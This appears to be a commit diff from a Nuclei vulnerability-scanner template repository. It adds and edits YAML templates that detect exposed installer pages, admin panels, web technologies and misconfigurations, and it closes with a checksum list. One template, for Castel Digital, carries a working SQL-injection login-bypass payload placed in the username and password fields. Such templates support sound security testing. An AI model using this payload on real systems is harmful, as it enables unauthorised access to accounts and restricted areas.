matchers-condition: or
matchers:
- type: dsl
dsl:
- 'startswith(tolower(location), "http://")'
- 'startswith(tostring(BaseURL), "https://")'
- '(status_code == 301 || status_code == 302 || status_code == 307)'
- '(status_code == 300 || status_code == 301 || status_code == 302 || status_code == 303 || status_code == 307 || status_code == 308)'
condition: and
# digest: 4a0a0047304502206212deffff885bc2abd110b7921124764815e61844a28cf278f271f6d9753151022100861fee57cff6e033d3b77a48aa8a88595f5d7ea267d502b1aadf739e417f6608:922c64590222798bb761d5b6d8e72950
- type: dsl
dsl:
- 'startswith(tostring(BaseURL), "https://")'
- 'status_code == 200'
- 'contains(tolower(body), "<meta http-equiv=\"refresh\" content=\"0; url=http://")'
condition: and
# digest: 4a0a0047304502202c406d624823af9ef6ae82678b8dfe498a4da9ca22667ad1fb02f10ac0f23842022100afad097672382230a4c19ddf9d918cf336c624af3d33cc1fe279c3fdf43a1a98:922c64590222798bb761d5b6d8e72950

32
http/misconfiguration/installer/custom-xoops-installer.yaml Normal file
View File

@ -0,0 +1,32 @@
id: custom-xoops-installer
info:
name: XOOPS Custom - Installation
author: DhiyaneshDK
severity: high
description: |
Detects the presence of XOOPS Custom installation page.
reference:
- https://www.exploit-db.com/ghdb/1115
metadata:
verified: true
max-request: 1
fofa-query: title="XOOPS Custom Installation"
tags: misconfig,xoops,installer
http:
- method: GET
path:
- "{{BaseURL}}/install/index.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>XOOPS Custom Installation</title>"
- type: status
status:
- 200
# digest: 4b0a00483046022100fe6c64399fa97ddc70f654c6d781595518749e45cc05b7cab9b832ce2edcf8da022100b95d4ddf25b8f154239914b4e336defb77e6c685bdc96f9e31fdcd6e6f6bc671:922c64590222798bb761d5b6d8e72950

32
http/misconfiguration/installer/froxlor-installer.yaml Normal file
View File

@ -0,0 +1,32 @@
id: froxlor-installer
info:
name: Froxlor Server Management - Installer
author: DhiyaneshDK
severity: high
description: |
Detects the Froxlor Server Management Panel installation page.
reference:
- https://www.exploit-db.com/ghdb/8397
metadata:
verified: true
max-request: 1
fofa-query: title="Froxlor Server Management Panel - Installation"
tags: misconfig,froxlor,installer
http:
- method: GET
path:
- "{{BaseURL}}/install/install.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Froxlor Server Management Panel - Installation"
- type: status
status:
- 200
# digest: 490a004630440220695c81721e332a2db39f811d04654510ceb4713c52764cff3d2696fb5b9988ec0220177dd8a1a70a903fc09d70bc443fa2b0a5174ca43f3c515996b14604ee1bbf87:922c64590222798bb761d5b6d8e72950

28
http/misconfiguration/installer/moosocial-installer.yaml Normal file
View File

@ -0,0 +1,28 @@
id: moosocial-installer
info:
name: mooSocial Installation - Exposure
author: ritikchaddha
severity: high
metadata:
verified: true
max-request: 1
shodan-query: html:"mooSocial Installation"
tags: exposure,moosocial,misconfig,install
http:
- method: GET
path:
- "{{BaseURL}}/install"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Welcome to mooSocial Installation'
- type: status
status:
- 200
# digest: 490a004630440220604d6fd4b0d42d00cb69a6de6fd9fb6be4640fc77b52f7a5cd456b70204f44ac02201a0443dafa9f1e76cfee113ecdda14756f8c86e9721abeab06b8f5ec67d2472d:922c64590222798bb761d5b6d8e72950

32
http/misconfiguration/installer/phpmyfaq-installer.yaml Normal file
View File

@ -0,0 +1,32 @@
id: phpmyfaq-installer
info:
name: phpMyFAQ Installation - Exposure
author: ritikchaddha
severity: high
description: phpMyFAQ installation is exposed.
metadata:
verified: true
max-request: 1
fofa-query: "phpMyFAQ-setup"
tags: misconfig,phpmyfaq,install
http:
- method: GET
path:
- "{{BaseURL}}/setup/index.php"
matchers-condition: or
matchers:
- type: word
part: body
words:
- '<title>phpMyFAQ'
- 'Setup</title>'
condition: and
- type: word
part: header
words:
- 'phpmyfaq-setup'
# digest: 490a0046304402201791f7ef0c860c7e565d6b7f79b3552d97890f2ef5a32e3ea9e1e83e8e05dc7f022000ceca0e611b72fd804a249e967c96b9d9762df4abcd70c1de5cf4aaeece0423:922c64590222798bb761d5b6d8e72950

5
http/misconfiguration/setup-github-enterprise.yaml → http/misconfiguration/installer/setup-github-enterprise.yaml
View File

@ -8,7 +8,7 @@ info:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1373456171
tags: panel,exposure,setup,github,misconfig
tags: misconfig,installer,github,setup
http:
- method: GET
@ -27,5 +27,4 @@ http:
- type: status
status:
- 200
# digest: 490a00463044022054ec1cd746591f30334be3d3af156ab086f89a6120fb908f899320a462f7ac8e02204e63937eb2e1648bfb9cdc3f74cd58e4846ee18ad4d2db21b9e7db237578ec4e:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100911c30fdb8aa2b865bb630663e66aa292b65b0e91a21c955154bf6987844f57c022100a67b5578341817f8a797a7aa42e7da1defe873e526ae86e1556bbce22aaaff10:922c64590222798bb761d5b6d8e72950

7
http/misconfiguration/internal-ip-disclosure.yaml
View File

@ -29,7 +29,7 @@ http:
- type: regex
part: location
regex:
- '([0-9]{1,3}[\.]){3}[0-9]{1,3}'
- '^(10(?:\.\d{1,3}){3}|192\.168(?:\.\d{1,3}){2}|172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})$'
- type: dsl
dsl:
@ -44,6 +44,5 @@ http:
- type: regex
part: location
regex:
- '([0-9]{1,3}[\.]){3}[0-9]{1,3}'
# digest: 4a0a00473045022100be01acb985c09c3394bcce936ba1cc283802b1069e6fcc5f63196c772bd55f5a02207165d8ff2b202e511f03d2c75a241b2f933b85b3993f668651c3db8216243382:922c64590222798bb761d5b6d8e72950
- '^(10(?:\.\d{1,3}){3}|192\.168(?:\.\d{1,3}){2}|172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})$'
# digest: 490a0046304402202ccecab303233a1e75a78c8d3912d25f4b57cea0f77bde7b02f472f4084515f602205c380911aaf6c5293902999ed0f4901d57b5451c7fe26b1f1d209e9fee407854:922c64590222798bb761d5b6d8e72950

90
http/misconfiguration/microsoft/ms-exchange-local-domain.yaml
View File

@ -1,45 +1,45 @@
id: ms-exchange-local-domain
info:
name: Microsoft Exchange Autodiscover - Local Domain Exposure
author: userdehghani
severity: low
description: |
Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint.
impact: |
An attacker can leverage this information for reconnaissance and targeted attacks.
remediation: |
Restrict access to the Autodiscover service or configure it to not expose local domain information.
reference:
- https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
shodan-query: http.title:outlook exchange
tags: misconfig, microsoft,ms-exchange,ad,dc
http:
- method: GET
path:
- "{{BaseURL}}/autodiscover/autodiscover.json?Protocol=ActiveSync&Email=user@domain.tld&RedirectCount=1"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "(?i)(X-Calculatedbetarget:)"
- type: status
status:
- 200
- 302
extractors:
- type: kval
kval:
- x_calculatedbetarget
# digest: 490a0046304402205f025e53bc125c91f858165a0912ddc8edd46b6b2370f2ef02cad79aa821edb002200f38bd6dc2bf6d5add1b15173de97999b01080b7297cc21eeee3206f3aed7a2d:922c64590222798bb761d5b6d8e72950
id: ms-exchange-local-domain
info:
name: Microsoft Exchange Autodiscover - Local Domain Exposure
author: userdehghani
severity: info
description: |
Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint.
impact: |
An attacker can leverage this information for reconnaissance and targeted attacks.
remediation: |
Restrict access to the Autodiscover service or configure it to not expose local domain information.
reference:
- https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
shodan-query: http.title:outlook exchange
tags: misconfig, microsoft,ms-exchange,ad,dc
http:
- method: GET
path:
- "{{BaseURL}}/autodiscover/autodiscover.json?Protocol=ActiveSync&Email=user@domain.tld&RedirectCount=1"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "(?i)(X-Calculatedbetarget:)"
- type: status
status:
- 200
- 302
extractors:
- type: kval
kval:
- x_calculatedbetarget
# digest: 4a0a0047304502210097f4e7ab5764e0db53da23c04266b429b571322e42b0fad09912690d7b6b6fdd02202724f2e0e85ee16b159f4fea95e7e21447c003fae169973816932c90f362a2c0:922c64590222798bb761d5b6d8e72950

4
http/misconfiguration/titannit-web-exposure.yaml
View File

@ -10,7 +10,7 @@ info:
shodan-query: title:"TitanNit Web Control"
tags: misconfig,titannit,webcontrol,exposure
requests:
http:
- method: GET
path:
- "{{BaseURL}}"
@ -27,4 +27,4 @@ requests:
- type: status
status:
- 200
# digest: 4a0a004730450221008000902f0dd80d44d24d0aaa51dc88fb8ca6ea57bdbade552e272b651c9a0e2e02207dbc82cdb7f044cb3ec30f67daee04ba1b293f307cdf6a51b723b7d1720fed34:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022077208e0ba5999cbde1529675b00c4aef08f25d22e17a7e32c879f55fc08d959d022009302237c4976cf4ac3b3178a0e47031e8775526bf381a67ce375519524ac681:922c64590222798bb761d5b6d8e72950

36
http/misconfiguration/unigui-server-monitor-exposure.yaml Normal file
View File

@ -0,0 +1,36 @@
id: unigui-server-monitor-exposure
info:
name: UniGUI Server Monitor Panel - Exposure
author: serrapa
severity: low
description: |
Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data.
reference:
- https://www.unigui.com/doc/online_help/using-server-monitor-(server-c.htm
metadata:
verified: true
max-request: 1
shodan-query: title:"uniGUI"
fofa-query: title="uniGUI"
tags: exposure,unigui,misconfig
http:
- method: GET
path:
- "{{BaseURL}}/server"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains_any(body, "uniGUI Standalone Server", "uniGUI License Information", "Server Statistics")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(body, "layout:\"fit\",title:\"uniGUI Standalone Server\"")'
- 'contains(body, "layout:\"absolute\",title:\"Server Statistics\"")'
condition: or
# digest: 490a0046304402205766cced7933a5f2f8ba6e4cd966dad51910774c86ee9260bb819ad300d147570220621881cf5155550a9207b7e19241b39c6a0df15d8629dac7675d024c80d6f14c:922c64590222798bb761d5b6d8e72950

45
http/technologies/apache/apache-answer-detect.yaml Normal file
View File

@ -0,0 +1,45 @@
id: apache-answer-detect
info:
name: Apache Answer - Detection
author: omranisecurity
severity: info
description: |
Detects Apache Answer version through API endpoit
reference:
- https://answer.apache.org/
metadata:
shodan-query: http.favicon.hash:523757057
fofa-query: icon_hash="523757057"
verified: true
max-request: 1
tags: detect,tech,apache
http:
- method: GET
path:
- "{{BaseURL}}/answer/api/v1/siteinfo"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"code":'
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
extractors:
- type: regex
part: body
name: version
regex:
- '"version":"([^"]+)"'
# digest: 4b0a00483046022100e8b6cf0b4a146a98e2ea5be56454a84686c4de20f506b9c297c3b34b02905d930221008eb6c97ad0a6509d1e883e58004163afbfe3453aa32e30608e988f5e8df25d2a:922c64590222798bb761d5b6d8e72950

38
http/technologies/boa-web-server.yaml Normal file
View File

@ -0,0 +1,38 @@
id: boa-web-server
info:
name: Boa Web Server - Detect
author: johnk3r
severity: info
description: |
Boa is a single-tasking HTTP server. That means that unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections.
reference:
- https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/
- http://www.boa.org/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata:
shodan-query: "Server: Boa/"
verified: true
max-request: 1
tags: boa,tech
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "Server: Boa/"
extractors:
- type: kval
part: header
kval:
- Server
# digest: 4a0a0047304502202169ec1f1b72425327554db7f1a270b4560a3e56b3f12e0cde1f693f8031958702210083f4edf96fefff0f4aaa15cc8b8070c70f6d8fe222ecb2b68da0734125597713:922c64590222798bb761d5b6d8e72950

36
http/technologies/craftercms-detect.yaml Normal file
View File

@ -0,0 +1,36 @@
id: craftercms-detect
info:
name: CrafterCMS - Detect
author: righettod
severity: info
description: |
CrafterCMS was detected.
reference:
- https://craftercms.org/
metadata:
max-request: 1
verified: true
shodan-query: http.title:"craftercms"
tags: tech,craftercms,detect
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: header
words:
- 'CrafterCMS'
extractors:
- type: regex
part: body
group: 1
regex:
- 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter'
# digest: 4a0a00473045022100aa4f31503bb26790a17d6e8f9f02499ec52e767847cf7d75e8df780d7d4d211902202c89f6902d7c1b9362db5edc7ee975d910d5c3d99f0911ff0e6d27ba4a57e9cc:922c64590222798bb761d5b6d8e72950

24
http/technologies/favicon-detect.yaml
View File

@ -2,7 +2,7 @@ id: favicon-detect
info:
name: favicon-detection
author: un-fmunozs,DhiyaneshDk
author: un-fmunozs,DhiyaneshDk,idealphase
severity: info
reference:
- https://twitter.com/brsn76945860/status/1171233054951501824
@ -3731,8 +3731,28 @@ http:
dsl:
- "status_code==200 && (\"-1599943282\" == mmh3(base64_py(body)))"
- type: dsl
name: "Veeam Service Provider Console"
dsl:
- "status_code==200 && (\"-1728967963\" == mmh3(base64_py(body)))"
- type: dsl
name: "mooSocial"
dsl:
- "status_code==200 && (\"702863115\" == mmh3(base64_py(body)))"
- type: dsl
name: "n8n"
dsl:
- "status_code==200 && (\"-831756631\" == mmh3(base64_py(body)))"
- type: dsl
name: "umami"
dsl:
- "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))"
extractors:
- type: dsl
dsl:
- 'mmh3(base64_py(body))'
# digest: 4a0a00473045022100d5db6ca1e3fae692c3d73e04bb2b8f32fbb0ce71e9dbe0e5e2568124a785b0b902202a8410c129ccda07db2f0cff823f28efc91b909fe40a147716b71e8f016a177e:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100afa60b596fe20299d482f935df87359f0c8fb824c709cb56ef1f08634909a2000220316c27df890a1e6cb71ae4fe147ccd2465493542520ed705054c5a8df06cc1ac:922c64590222798bb761d5b6d8e72950

28
http/technologies/imgproxy-detect.yaml Normal file
View File

@ -0,0 +1,28 @@
id: imgproxy-detect
info:
name: Imgproxy Detect
author: userdehghani
severity: info
description: |
imgproxy is a fast and secure standalone server for resizing, processing, and converting images.
reference:
- https://imgproxy.net/
metadata:
verified: true
max-request: 1
shodan-query: html:"imgproxy"
tags: imgproxy,tech,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(server, "imgproxy")'
condition: and
# digest: 4a0a004730450221008dd8dabb9994876588a503140ed178a1de79fd8d1480c39fa4b046a06bc0363e02205805ad81daf64a85cf31f1e2f77dce657a89048a1c2db57fb59ed2c1ee78b443:922c64590222798bb761d5b6d8e72950

29
http/technologies/statamic-detect.yaml Normal file
View File

@ -0,0 +1,29 @@
id: statamic-detect
info:
name: Statamic - Detect
author: geeknik
severity: info
description: |
Statamic is the flat-first, Laravel + Git powered CMS designed for building beautiful, easy to manage websites.
reference:
- https://github.com/statamic/cms
metadata:
verified: true
max-request: 1
shodan-query: "Statamic"
tags: tech,statamic,detect
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: regex
part: header
regex:
- 'X-Powered-By:(.*)Statamic'
# digest: 490a00463044022056716af6b1942e84b678041e3433d215c8a0a61e9a77d2a1ff039396493f930a02205a431e513f4372119b25a1342dc81e41ceeb4173526610df4a7d7e2db3af003d:922c64590222798bb761d5b6d8e72950

33
http/technologies/tinyproxy-detect.yaml Normal file
View File

@ -0,0 +1,33 @@
id: tinyproxy-detect
info:
name: Tinyproxy - Detect
author: bhutch
severity: info
description: |
Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems
reference:
- https://github.com/tinyproxy/tinyproxy
metadata:
verified: true
max-request: 1
shodan-query: "Server: tinyproxy"
tags: tech,proxy,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "server: tinyproxy"
case-insensitive: true
extractors:
- type: kval
kval:
- server
# digest: 4b0a004830460221008ec97763de41920c6428a4b0e039d72a2a87b2e8d2fd891cfa7a70b0bd2c7ddc022100a1fbedfc84f6e0aaf4233a640e2589dfc2341243472f7125eb47bc15a3917e65:922c64590222798bb761d5b6d8e72950

51
http/technologies/uni-gui-framework.yaml Normal file
View File

@ -0,0 +1,51 @@
id: uni-gui-framework
info:
name: UniGUI Framework - Detect
author: serrapa
severity: info
description: |
Checks for the presence of UniGUI framework and extracts its version along with the Sencha Ext JS version.
metadata:
verified: true
max-request: 1
shodan-query: http.title:"UniGUI"
tags: tech,unigui
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "uni-xtheme-"
- "ext-all.js"
- "uniVars._extVer="
condition: or
- type: regex
part: body
regex:
- 'uni-(\d+\.\d+\.\d+\.\d+)/'
- 'uniVars._extVer="(\d+\.\d+\.\d+)"'
extractors:
- type: regex
part: body
name: uni_gui_version
regex:
- 'uni-(\d+\.\d+\.\d+\.\d+)'
- type: regex
part: body
name: ext_js_version
regex:
- 'uniVars._extVer="(\d+\.\d+\.\d+)"'
# digest: 490a0046304402206a748c936bf19bbd442ca7a03f7e7b4d7947a2a385b1b49e7f308d20a043cf5f022016ae7660962c0a4e9421084b61ff85f7490145cb44206622d7a369d80751e1ef:922c64590222798bb761d5b6d8e72950

37
http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml Normal file
View File

@ -0,0 +1,37 @@
id: wp-bricks-builder-theme
info:
name: WordPress Bricks Builder Theme Version
author: Anonymous
severity: info
description: |
- Checks for Bricks Builder Theme versions.
reference:
- https://0day.today/exploit/description/39489
metadata:
publicwww-query: "/wp-content/themes/bricks/"
verified: true
max-request: 1
tags: wordpress,theme,wp-theme,wp,bricks
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/bricks/readme.txt"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Bricks - Visual Website Builder"
- type: regex
part: body
regex:
- "Stable tag:([ 0-9.]+)"
- type: status
status:
- 200
# digest: 4a0a00473045022100c4459c83f851208e488f0f5bbeba4f40f1c2b14a227b689dba16c4c452d198b702206c63a5349ee0a6a1c5ba1f9065886fc44766c900aa9058cdda45ad713aa87241:922c64590222798bb761d5b6d8e72950

43
http/vulnerabilities/other/castel-digital-sqli.yaml Normal file
View File

@ -0,0 +1,43 @@
id: castel-digital-sqli
info:
name: Castel Digital - Authentication Bypass
author: Kazgangap
severity: high
description: |
SQL Injection vulnerability in Castel Digital login forms.
reference:
- https://www.casteldigital.com.br/
- https://cxsecurity.com/issue/WLB-2024050032
metadata:
verified: true
max-request: 2
google-query: "Castel Digital"
tags: sqli,auth-bypass,castel
http:
- raw:
- |
POST /restrito/login/sub/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x
- |
GET /restrito/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "Banner"
- "Construtoras"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100d80a22d4cf273f6271529eb7a45f6340388cc7b72da5125e620e24e141c66ac4022100dab34630a0cb5708cd7153359df8c7bbe5b45c9c7ee7cb0f076e31a29b76023d:922c64590222798bb761d5b6d8e72950

4
http/vulnerabilities/other/kiwitcms-json-rpc.yaml
View File

@ -11,7 +11,7 @@ info:
- https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml
metadata:
max-request: 1
shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337
shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337
tags: kiwitcms,exposure,misconfig,hackerone
http:
@ -44,4 +44,4 @@ http:
part: body
json:
- .result[].username
# digest: 490a0046304402206498b9c98e30e36688f5ed44b4b119d5dd1ccf445adb66e57f7430c853526cd2022017c30c42721f5093f153a99b3600c36db25acd2c54a4141e2e0922f0da109afa:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e625a29f9198b07723d4e26329a8d2d947c7240aadf04e2859b0f6dff1acdead02200b19f7aac7e79222c4418add2934c0704dab1ee621e7b45540127028968ed156:922c64590222798bb761d5b6d8e72950

38
javascript/enumeration/checkpoint-firewall-enum.yaml Normal file
View File

@ -0,0 +1,38 @@
id: checkpoint-firewall-enum
info:
name: Check Point Firewall - Detect
author: pussycat0x
severity: info
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/checkpoint_hostname.rb
metadata:
verfied: true
shodan-query: product:"Check Point Firewall"
tags: js,network,firewall,checkpoint,enum
javascript:
- code: |
let packet = bytes.NewBuffer();
let prob = "\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00"
data = packet.Write(prob)
const c = require("nuclei/net");
let conn = c.Open('tcp', `${Host}:${Port}`);
conn.Send(data);
let resp = conn.RecvFullString();
let regex = /CN=(.+),O=(.+?)\./i;
let match = resp.match(regex);
let fw_hostname = match[1];
let sc_hostname = match[2];
let result = (`Firewall Host: ${fw_hostname}, SmartCenter Host: ${sc_hostname}`);
result
args:
Host: "{{Host}}"
Port: 264
extractors:
- type: dsl
dsl:
- response
# digest: 4b0a00483046022100ee7f1b386f2f382432b2846abb2832434819f68e200c9e7063099dead504f141022100f85c2860578d5e28ebc3fc651d9928447b42bcd28b5d510c7cf40223f8d5fd8e:922c64590222798bb761d5b6d8e72950

33
network/detection/weblogic-t3-detect.yaml
View File

@ -6,24 +6,20 @@ info:
severity: info
description: |
T3 is the protocol used to transport information between WebLogic servers and other types of Java programs.
impact: |
May indicate potential exposure to Weblogic T3 Protocol vulnerabilities
remediation: |
Ensure proper configuration and security measures are in place for Weblogic T3 Protocol
metadata:
max-request: 2
tags: network,weblogic,detect,t3,oracle
tcp:
- inputs:
- data: "t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001
\n"
- data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
host:
- "{{Hostname}}"
port: 7001
read-size: 1024
matchers:
- type: word
@ -38,20 +34,11 @@ tcp:
- "HELO:(.*).false"
- inputs:
- data: "t3s 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001
\n"
- data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
host:
- "tls://{{Hostname}}"
read-size: 1024
port: 7002
matchers:
- type: word
words:
@ -63,4 +50,4 @@ tcp:
group: 1
regex:
- "HELO:(.*).false"
# digest: 4b0a004830460221008e4fc5512e10a4bac580826b8cb65a981a9ef61b55f63c6f892cf0dde4b500a8022100e08f41e4f5d99713ff8e920b11a1fdfa70f7b1f5f5d0a2df25aa91bf69a010df:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100facd45545006bc9f15dfbf5927e636142e1983912edf41f16247c32732bde2570220480584b7a2efa59dd5d643adefc5cb750e10c155f054ca2bcde4de68a97cbd64:922c64590222798bb761d5b6d8e72950

9
profiles/wordpress.yml Normal file
View File

@ -0,0 +1,9 @@
# This is a configuration file for the wordpress template profile.
# Additional configuration profiles can be created for different types of nuclei scans.
# They should be placed under the 'profiles' directory at:
# https://github.com/projectdiscovery/nuclei-templates
# Here is an example of how to use a profiles profile:
# nuclei -config profiles/wordpress.yml -list target_list_to_scan.txt
tags:
- wordpress

121
templates-checksum.txt
View File

@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593
CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71
LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df
PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7
README.md:70736c6faaf92554e4711d1ccdb709abe1ccfb0d
README.md:6c60460e1b0f948b5ee382edcedf044ba5aff856
README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26
TEMPLATES-STATS.json:dd9a2992caeffaa53bbda5f3166a5f2df1dc3210
TEMPLATES-STATS.md:47130017e50921075ff79d152501d5e3ac88eb0b
TOP-10.md:19dc2fecaf3933fe8c0c250b8c2ebfa0fa89854c
TEMPLATES-STATS.json:f43402ca0284acc690f4d239afd477488d220182
TEMPLATES-STATS.md:7d758b52f7d1c73e19018bddb902f0076bd4a867
TOP-10.md:3e73524df2b18729f1e3def717dac5e973708c14
cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f
cloud/aws/acm/acm-cert-renewal-30days.yaml:a90f78e355c103211f113d112ced769e7a0297a2
cloud/aws/acm/acm-cert-renewal-45days.yaml:31dd523c386a3e2fce9e6882f0bd6eadcb5d9527
@ -19,7 +19,7 @@ cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:71aafc94886bc0bf1ad799a59043ccb14c
cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:0fdecbb14773ede92defb5550f8b6f280675ae77
cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:4e6f15779999587b4ebbcf8b0ddc523155decb48
cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:2493c4d57eef3d147cf93ffd7a492cfc409f1426
cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:8c6cf3eeb8314189731e7c5925fb8f3b9057f278
cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:4f082a6a5aed38fdbf01a3194fbaffc4cd799a8a
cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:ca1a07dc81a0071d64ab7a4d9868367d1c7465ea
cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:c5c333bcd31a6282a913a9cfe7a440566ed1bb78
cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:4fd566c83837e16dbc3b4db04b840b0abcba2804
@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd
code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159
cves.json:0820bc134ca52d7071cc8c6596b3ac37a095a0ae
cves.json-checksum.txt:996eafaef74b06977788950a04aeebf48b096611
cves.json:5cc15bbdbdf77cdc98f62333d1674a451ef23c76
cves.json-checksum.txt:eaeeca8d28a10d9264e42d57757cbb121db0aada
dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22
dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396
dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e
@ -201,7 +201,7 @@ dast/vulnerabilities/csti/angular-client-side-template-injection.yaml:a76f2f0b28
dast/vulnerabilities/lfi/lfi-keyed.yaml:366e7b0c3bdef023427815022e64ed88b6e1d3d5
dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:71bfad9f7132086665db55b8c5aeeee3adf23d89
dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:f3663bb5ab092b4fc1e69998c2d92d64312dc57f
dast/vulnerabilities/redirect/open-redirect.yaml:0e16729d72a4b492267144a21d378c118dd38195
dast/vulnerabilities/redirect/open-redirect.yaml:fe71f239a2fa403c11e86a54ec0f5685020f43bf
dast/vulnerabilities/rfi/generic-rfi.yaml:ac4f9582d4d9b7930d28dbc0f21eede8df760507
dast/vulnerabilities/sqli/sqli-error-based.yaml:ab3efe10b425fed28b569a88fd149d7e7ac706df
dast/vulnerabilities/ssrf/blind-ssrf.yaml:83027f4642aeaf84e49f09fc876ff91d6002f3af
@ -210,14 +210,14 @@ dast/vulnerabilities/ssti/reflection-ssti.yaml:f88426f514ecbe514a5b988b2e826d967
dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253
dast/vulnerabilities/xss/reflected-xss.yaml:1faff32e9ad4bb73f0476c526f9b6ef6d5a51757
dast/vulnerabilities/xxe/generic-xxe.yaml:54b04c0c3b8d50d6305ed48ac7997f1aeeea426d
dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4
dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a
dns/bimi-detect.yaml:49b1f8b7289261ba3926483a41fa213f921248f2
dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24
dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2
dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37
